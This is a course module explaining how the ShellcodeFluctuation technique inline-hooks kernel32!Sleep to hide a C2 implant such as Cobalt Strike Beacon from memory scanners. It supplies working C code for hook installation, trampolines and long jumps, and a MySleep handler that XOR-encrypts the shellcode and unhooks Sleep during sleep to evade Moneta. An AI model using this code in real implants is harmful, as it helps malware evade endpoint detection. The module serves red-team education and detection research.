Module 4: Sleep Function Hooking
How ShellcodeFluctuation intercepts kernel32!Sleep via inline hooking to gain control before and after the implant sleeps.
Module Objective
Understand how inline function hooking works, why ShellcodeFluctuation hooks kernel32!Sleep specifically, the trampoline mechanism for calling the original function, the MySleep handler architecture, and why the hook is temporarily removed during the actual sleep call.
1. Why Hook Sleep?
Cobalt Strike Beacon (and most C2 implants) calls kernel32!Sleep to pause between check-ins. This is the natural interception point for ShellcodeFluctuation because:
Sleep as the Interception Target
- Guaranteed to be called — every beacon cycle includes a sleep. The implant cannot avoid calling it
- Called from within the implant — the call originates from the shellcode itself, so hooking Sleep intercepts at exactly the right moment
- Single point of control — one hook gives control over every transition between active and idle states
- Natural boundary — Sleep marks the exact moment when the implant transitions from "doing work" to "waiting" — the ideal time to encrypt
- Known function signature: `void WINAPI Sleep(DWORD dwMilliseconds)` has a single parameter, making it easy to wrap
2. Inline Hooking vs IAT Hooking
There are two primary approaches to hooking a Windows API function. ShellcodeFluctuation uses inline hooking:
| Method | Mechanism | Pros | Cons |
|---|---|---|---|
| IAT Hooking | Modify the Import Address Table entry for Sleep to point to the hook function | No code modification; works with the PE loader | Only affects imports through the hooked module's IAT; does not catch calls from other modules or via GetProcAddress |
| Inline Hooking | Overwrite the first bytes of kernel32!Sleep with a JMP to the hook function | Catches ALL calls to Sleep regardless of how they are resolved | Modifies mapped DLL code (triggers copy-on-write); must save original bytes for trampoline |
ShellcodeFluctuation uses inline hooking because Cobalt Strike Beacon resolves Sleep via GetProcAddress at runtime, bypassing the IAT entirely. An IAT hook would never intercept the call.
3. Inline Hook Mechanics
An inline hook replaces the first instructions of the target function with a jump to the hook handler. The original instructions are preserved in a "trampoline" so the original function can still be called.
// kernel32!Sleep original bytes (x64):
//   48 89 5C 24 08    mov [rsp+8], rbx    ; 5 bytes
//   57                push rdi
//   48 83 EC 40       sub rsp, 0x40
//   ...
// After inline hook installation:
//   E9 XX XX XX XX    jmp MySleep         ; 5-byte relative jump replaces the mov
//   57                push rdi            ; untouched; the trampoline jumps back here (Sleep+5)
//   48 83 EC 40       sub rsp, 0x40
//   ...
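The `XX XX XX XX` operand in the listing above is a signed 32-bit displacement measured from the end of the 5-byte jump, not from its start. The following is a minimal, platform-independent sketch of that arithmetic; `EncodeRelJmp` is a hypothetical helper name used only for illustration, and the addresses are plain integers rather than live pointers.

```cpp
#include <cstdint>

// Encode "E9 rel32" for a jump located at address `from` that lands on `to`.
// Returns false when the displacement does not fit in a signed 32-bit value.
bool EncodeRelJmp(std::uint64_t from, std::uint64_t to, std::uint8_t out[5]) {
    // The CPU adds rel32 to the address of the NEXT instruction (from + 5).
    const std::int64_t disp =
        static_cast<std::int64_t>(to) - static_cast<std::int64_t>(from) - 5;
    if (disp < INT32_MIN || disp > INT32_MAX) return false;

    // Keep the two's-complement bit pattern and emit it little-endian.
    const std::uint32_t bits = static_cast<std::uint32_t>(disp);
    out[0] = 0xE9;
    for (int i = 0; i < 4; ++i) {
        out[1 + i] = static_cast<std::uint8_t>(bits >> (8 * i));
    }
    return true;
}
```

For a jump at `0x1000` targeting `0x2000`, the displacement is `0x2000 - 0x1005 = 0xFFB`, so the encoded bytes are `E9 FB 0F 00 00`.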
Hook Installation Steps
- Resolve target address: get the address of `kernel32!Sleep` via `GetProcAddress`
- Save original bytes: copy the first N bytes from the function prologue (enough for the JMP instruction)
- Make writable: `VirtualProtect` the target page to `PAGE_EXECUTE_READWRITE`
- Write JMP: overwrite the first bytes with a relative or absolute JMP to `MySleep`
- Restore protection: `VirtualProtect` back to `PAGE_EXECUTE_READ`
- Build trampoline: allocate a small code region containing the saved bytes followed by a JMP back to `Sleep+N`
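// Simplified inline hook installation (5-byte E9 rel32 form only).
// Assumes the first HOOK_SIZE bytes of targetFunc end on an instruction
// boundary and contain no RIP-relative instructions.
#include <windows.h>
#include <string.h>
BOOL InstallHook(LPVOID targetFunc, LPVOID hookFunc, LPVOID* trampoline) {
    const SIZE_T HOOK_SIZE = 5;  // E9 rel32 is 5 bytes on both x86 and x64
    BYTE* target = (BYTE*)targetFunc;
    // 1. Allocate trampoline
    BYTE* tramp = (BYTE*)VirtualAlloc(NULL, 64, MEM_COMMIT | MEM_RESERVE,
                                      PAGE_EXECUTE_READWRITE);
    if (!tramp) return FALSE;
    // rel32 is measured from the end of each 5-byte JMP. On x64 both
    // displacements must fit in 32 bits, otherwise a longer jump is needed.
    INT_PTR backDisp = (INT_PTR)(target + HOOK_SIZE) - (INT_PTR)(tramp + HOOK_SIZE + 5);
    INT_PTR hookDisp = (INT_PTR)hookFunc - (INT_PTR)(target + 5);
    DWORD oldProt;
    if (backDisp != (INT32)backDisp || hookDisp != (INT32)hookDisp ||
        !VirtualProtect(target, HOOK_SIZE, PAGE_EXECUTE_READWRITE, &oldProt)) {
        VirtualFree(tramp, 0, MEM_RELEASE);
        return FALSE;
    }
    // 2. Copy original bytes to trampoline
    memcpy(tramp, target, HOOK_SIZE);
    // 3. Append JMP back to targetFunc + HOOK_SIZE
    INT32 back32 = (INT32)backDisp;
    tramp[HOOK_SIZE] = 0xE9;  // relative JMP
    memcpy(tramp + HOOK_SIZE + 1, &back32, sizeof(back32));
    // 4. Write JMP to hookFunc at target
    INT32 hook32 = (INT32)hookDisp;
    target[0] = 0xE9;  // relative JMP
    memcpy(target + 1, &hook32, sizeof(hook32));
    VirtualProtect(target, HOOK_SIZE, oldProt, &oldProt);
    FlushInstructionCache(GetCurrentProcess(), target, HOOK_SIZE);
    *trampoline = tramp;
    return TRUE;
}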
4. The x64 Long-Jump Problem
On x86-64, a 5-byte relative JMP (E9) can only reach addresses within +/- 2 GB of the instruction. Since kernel32.dll and the hook function may be more than 2 GB apart in the 64-bit address space, ShellcodeFluctuation may need to use a longer jump sequence:
// Option 1: Relative JMP (5 bytes) - works if within 2 GB
//   E9 [rel32]
//   Range: -2,147,483,648 to +2,147,483,647 bytes, measured from the end of the JMP
// Option 2: Absolute indirect JMP (14 bytes) - works anywhere
//   FF 25 00 00 00 00          jmp [rip+0]
//   XX XX XX XX XX XX XX XX    ; 8-byte absolute address
// ShellcodeFluctuation approach:
//   Uses 14-byte absolute JMP when the hook function is
//   more than 2 GB from the target
void WriteAbsoluteJmp(BYTE* target, LPVOID destination) {
    // FF 25 00 00 00 00 = jmp qword ptr [rip+0]
    target[0] = 0xFF;
    target[1] = 0x25;
    *(DWORD*)(target + 2) = 0;                     // RIP-relative offset = 0
    *(UINT64*)(target + 6) = (UINT64)destination;  // address read by the JMP
    // Total: 14 bytes
}
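The choice between the two encodings comes down to one range check. The sketch below works on plain integers so it can be compiled anywhere; `FitsRel32`, `HookSizeFor`, and `BuildAbsoluteJmp` are hypothetical names introduced for illustration and are not taken from the tool's source.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// True when a 5-byte E9 jump placed at `from` can reach `to`.
bool FitsRel32(std::uint64_t from, std::uint64_t to) {
    const std::int64_t disp =
        static_cast<std::int64_t>(to) - static_cast<std::int64_t>(from) - 5;
    return disp >= INT32_MIN && disp <= INT32_MAX;
}

// Number of bytes the hook will overwrite at `from`.
std::size_t HookSizeFor(std::uint64_t from, std::uint64_t to) {
    return FitsRel32(from, to) ? 5 : 14;
}

// FF 25 00000000 followed by the 8-byte little-endian destination.
std::vector<std::uint8_t> BuildAbsoluteJmp(std::uint64_t to) {
    std::vector<std::uint8_t> code = {0xFF, 0x25, 0x00, 0x00, 0x00, 0x00};
    for (int i = 0; i < 8; ++i) {
        code.push_back(static_cast<std::uint8_t>(to >> (8 * i)));
    }
    return code;
}
```

Note that the larger encoding also raises the number of prologue bytes that must be saved, which is why the byte count discussed next matters.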
Byte Count Matters
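The number of original bytes overwritten must end on an instruction boundary. If the copy stops in the middle of an instruction, the trampoline executes a truncated instruction followed by the jump back, which produces invalid code. A length-disassembly engine (LDE) is typically used to find the smallest run of whole instructions that covers the jump (5 bytes for the E9 form, 14 bytes for the absolute form). Instructions with RIP-relative operands additionally need their displacements adjusted when they are relocated into the trampoline.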
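As a rough illustration of the boundary rule, the sketch below sums instruction lengths until the jump is covered. In practice the lengths would come from an LDE; here they are supplied by the caller, and `BytesToSave` is a hypothetical helper name.

```cpp
#include <cstddef>
#include <vector>

// Returns the smallest instruction-aligned byte count that is >= hookSize,
// or 0 if the supplied instruction lengths do not cover hookSize.
std::size_t BytesToSave(const std::vector<std::size_t>& instrLengths,
                        std::size_t hookSize) {
    std::size_t total = 0;
    for (std::size_t len : instrLengths) {
        if (total >= hookSize) break;  // already covered by whole instructions
        total += len;
    }
    return total >= hookSize ? total : 0;
}
```

With the prologue from Section 3 (instruction lengths 5, 1, 4), a 5-byte jump needs exactly 5 saved bytes. A 14-byte jump is not covered by those three instructions (10 bytes), so more of the function would have to be decoded before the hook could be placed.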
5. The MySleep Handler
The hook redirects all calls to kernel32!Sleep to ShellcodeFluctuation's MySleep function. This is the heart of the fluctuation mechanism:
// Global state
LPVOID g_shellcodeBase = nullptr;
SIZE_T g_shellcodeSize = 0;
DWORD  g_xorKey = 0;
LPVOID g_sleepTrampoline = nullptr;  // Trampoline to original Sleep
// The hook handler - called instead of kernel32!Sleep
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Phase 1: ENCRYPT
    // Flip shellcode to writable
    DWORD oldProt;
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    // XOR encrypt the shellcode region
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
    // Phase 2: SLEEP
    // Call original Sleep via trampoline
    typedef void (WINAPI* fnSleep)(DWORD);
    ((fnSleep)g_sleepTrampoline)(dwMilliseconds);
    // Phase 3: DECRYPT
    // XOR decrypt the shellcode region
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
    // Flip shellcode back to executable
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);
}
// Execution returns to the shellcode, which continues normally
MySleep Execution Flow
Beacon calls Sleep(60000) -> MySleep -> Flip to RW -> XOR encrypt -> original Sleep() -> XOR decrypt -> Flip to RX -> return to Beacon
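The handler calls `xor32` for both encryption and decryption, which works because XOR with the same key is its own inverse. The listing above does not show the function body, so the following is only an assumed shape: a repeating 4-byte key applied byte by byte, written with standard fixed-width types instead of `BYTE`, `SIZE_T`, and `DWORD`.

```cpp
#include <cstddef>
#include <cstdint>

// Assumed sketch of xor32: XOR every byte of the buffer with the matching
// byte of a repeating 32-bit key (least significant key byte first).
void xor32(std::uint8_t* buf, std::size_t size, std::uint32_t key) {
    for (std::size_t i = 0; i < size; ++i) {
        buf[i] ^= static_cast<std::uint8_t>(key >> (8 * (i % 4)));
    }
}
```

Calling the function twice with the same key leaves the buffer unchanged, which is why Phase 1 and Phase 3 can share one routine.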
6. Why Unhook Before Sleeping
A critical detail in ShellcodeFluctuation's implementation: the inline hook on kernel32!Sleep is temporarily removed before the actual sleep call and reinstalled after waking. This is done to eliminate the "Modified code" IOC in Moneta:
// Improved MySleep with hook/unhook cycle
// Additional globals, assumed to be filled in when the hook is installed
LPVOID g_sleepFunc = nullptr;      // Address of kernel32!Sleep
SIZE_T g_hookSize = 0;             // Number of prologue bytes overwritten
BYTE   g_originalBytes[16] = {};   // Saved prologue bytes
BYTE   g_hookBytes[16] = {};       // JMP bytes that redirect to MySleep
void WINAPI MySleep(DWORD dwMilliseconds) {
    // Phase 1: ENCRYPT
    DWORD oldProt;
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
    // Phase 1.5: UNHOOK Sleep
    // Restore original bytes to kernel32!Sleep
    DWORD hookProt;
    VirtualProtect(g_sleepFunc, g_hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_sleepFunc, g_originalBytes, g_hookSize);
    VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);
    FlushInstructionCache(GetCurrentProcess(), g_sleepFunc, g_hookSize);
    // Phase 2: SLEEP (with clean kernel32)
    Sleep(dwMilliseconds);  // Direct call - no hook in place
    // Phase 3: RE-HOOK Sleep
    VirtualProtect(g_sleepFunc, g_hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_sleepFunc, g_hookBytes, g_hookSize);
    VirtualProtect(g_sleepFunc, g_hookSize, hookProt, &hookProt);
    FlushInstructionCache(GetCurrentProcess(), g_sleepFunc, g_hookSize);
    // Phase 4: DECRYPT
    xor32((BYTE*)g_shellcodeBase, g_shellcodeSize, g_xorKey);
    VirtualProtect(g_shellcodeBase, g_shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);
}
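The unhook and rehook phases are two copies between three byte buffers: the patched location, the saved original bytes, and the jump bytes. The sketch below models only that bookkeeping on an ordinary array, with no page-protection calls; `PatchSite` and its members are hypothetical names, and the array stands in for the function prologue.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Bookkeeping for one patched location. `site` stands in for the prologue.
struct PatchSite {
    std::uint8_t* site;
    std::vector<std::uint8_t> original;  // bytes present before patching
    std::vector<std::uint8_t> hook;      // jump bytes to write

    PatchSite(std::uint8_t* where, const std::vector<std::uint8_t>& hookBytes)
        : site(where),
          original(where, where + hookBytes.size()),  // snapshot first
          hook(hookBytes) {}

    void Install() { std::memcpy(site, hook.data(), hook.size()); }
    void Remove()  { std::memcpy(site, original.data(), original.size()); }

    // True when the location currently matches the snapshot.
    bool IsClean() const {
        return std::memcmp(site, original.data(), original.size()) == 0;
    }
};
```

Bytes beyond the hook length are never touched, so only the first `hook.size()` bytes differ while the patch is installed.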
Why This Matters
During the sleep window (when scanners are most likely to scan), kernel32!Sleep contains its original, unmodified bytes. Moneta comparing in-memory kernel32 against the on-disk file will find no differences. The hook is only present during the brief active window when the implant is executing — the same window that is already too short for reliable scanning.
The Persistent IOC
Even with the unhook/rehook cycle, the copy-on-write page persists. Writing to kernel32's .text section (even temporarily) converts the shared page to a private page. Moneta can detect that kernel32 has private pages in its .text section, even if the content matches the on-disk file. However, the IOC message changes from "Modified code" (suspicious) to a weaker working-set anomaly (less suspicious, as legitimate processes can also cause private pages).
7. Hook/Unhook Timing Window
Understanding the exact timing of when the hook is present vs absent is critical for evaluating the technique's effectiveness:
| Phase | Hook Present? | Shellcode State | Duration | Scanner Risk |
|---|---|---|---|---|
| Active execution | Yes | RX + Cleartext | ~100ms | Hook detectable, shellcode scannable (but brief) |
| MySleep entry | Yes | Transitioning | ~microseconds | Minimal |
| After unhook | No | RW + Encrypted | ~60 seconds | Neither hook nor shellcode detectable |
| After rehook | Yes | Transitioning | ~microseconds | Minimal |
| Active execution | Yes | RX + Cleartext | ~100ms | Hook detectable, shellcode scannable (but brief) |
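To put the table's approximate durations in proportion, the fraction of each cycle during which the hook and cleartext shellcode are both present can be estimated as follows. This is a back-of-the-envelope figure that takes the ~100 ms and ~60 s values at face value and ignores the microsecond-scale transitions.

```latex
f_{\text{exposed}}
  = \frac{t_{\text{active}}}{t_{\text{active}} + t_{\text{sleep}}}
  \approx \frac{0.1\,\text{s}}{0.1\,\text{s} + 60\,\text{s}}
  \approx 0.0017
```

Under these assumptions the exposed state accounts for roughly 0.17% of each cycle; a shorter sleep interval or a longer active phase raises that share proportionally.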
8. Trampoline vs Direct Call
After unhooking Sleep, the implementation can call Sleep directly rather than through the trampoline. This is a cleaner approach because the trampoline is no longer needed once the original bytes are restored:
// Two approaches to calling original Sleep:
// Approach 1: Via trampoline (used when hook stays in place)
// The trampoline contains:
// [original bytes from Sleep prologue]
// [JMP back to Sleep + hookSize]
// This allows calling original Sleep without removing the hook.
// Approach 2: Direct call after unhooking (ShellcodeFluctuation)
// Since we restore original bytes before sleeping:
// 1. Unhook: restore original bytes to kernel32!Sleep
// 2. Call Sleep() directly - it's now unmodified
// 3. Rehook: install JMP bytes again
// Cleaner: no trampoline allocation, no extra executable memory
Approach Comparison
| Factor | Trampoline (hook stays) | Unhook/Rehook (ShellcodeFluctuation) |
|---|---|---|
| Hook visible during sleep? | Yes — kernel32 modified | No — kernel32 clean |
| Extra allocation? | Yes — trampoline is executable private memory | No — original function used directly |
| Complexity | Simpler (one-time setup) | More complex (restore/reinstall per cycle) |
| Performance | Slightly faster (no memcpy per cycle) | Slightly slower (two memcpy per cycle) |
| Stealth | Lower — hook always visible | Higher — hook only visible during execution |
Knowledge Check
Q1: Why does ShellcodeFluctuation use inline hooking rather than IAT hooking for kernel32!Sleep?
Q2: Why is the Sleep hook temporarily removed before the actual sleep call?
Q3: What is the purpose of a trampoline in inline hooking?